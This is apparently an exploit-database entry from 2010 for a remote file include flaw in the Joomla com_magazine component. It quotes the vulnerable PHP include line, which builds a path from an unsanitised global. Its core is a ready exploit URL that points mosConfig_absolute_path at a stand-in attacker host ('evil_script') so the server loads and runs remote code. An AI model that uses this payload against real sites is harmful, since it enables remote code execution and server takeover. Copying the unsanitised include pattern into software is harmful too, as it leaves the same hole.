Joomla Component com_magazine Remote File Include Vulnerability

2010-03-30T00:00:00
ID 1337DAY-ID-11503
Type zdt
Reporter Febronio
Modified 2010-03-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================================
Joomla Component com_magazine Remote File Include Vulnerability
===============================================================


     o   \ o /  _ o        __|    \ /    |__         o _  \ o /   o
    /|\    |     /\   __\o   \o    |    o/    o/__   /\     |    /|\
    / \   / \   | \  /) |    ( \  /o\  / )    |  (\  / |   / \   / \

      Discovered by: Febronio - febronio[at]linuxmail.org


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vulnerable File:

* magazine.html.php

global $mosConfig_absolute_path;
require_once($mosConfig_absolute_path."/administrator/components/com_magazine/utf8/utf8.php");

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://target/administrator/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://evil_script?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2018-03-01]  #